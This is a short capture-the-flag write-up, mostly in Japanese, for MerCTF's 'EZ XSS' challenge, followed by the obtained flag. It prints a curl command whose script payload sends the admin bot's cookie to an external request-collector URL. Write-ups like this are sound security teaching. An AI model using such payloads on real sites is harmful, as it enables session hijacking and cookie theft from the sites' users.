Skip to content

Latest commit

 

History

History

EZ_XSS

Folders and files

NameName
Last commit message
Last commit date

parent directory

..

images

images

 
 

site

site

 
 

README.md

README.md

 
 

README.md

EZ XSS:MerCTF:430pts

Let's jump to a client-side challenge for XSS lovers. Just steal the admin (bot) cookie :ganbare:
URL: http://ezxss.merctf.com/test

Solution

URLにアクセスすると、よくわからないが/submit?solution=payloadでXSSしろということらしい。
site.png
以下のようにcookieを取得するXSSを打ち込んでやる(RequestBin.comなどで受信する)。

$ curl 'http://ezxss.merctf.com/submit?solution=<script>location.href="https://en43puqb75xk6.x.pipedream.net/?s="%2Bdocument.cookie</script>'
If it is correct, you should receive your flag, right?

以下のようなリクエストが届く。
cookie.png
cookieにflagが入っていた。

Merctf{GoOd_XsS_GoOd_T1mE_JoIn_MeRcAri}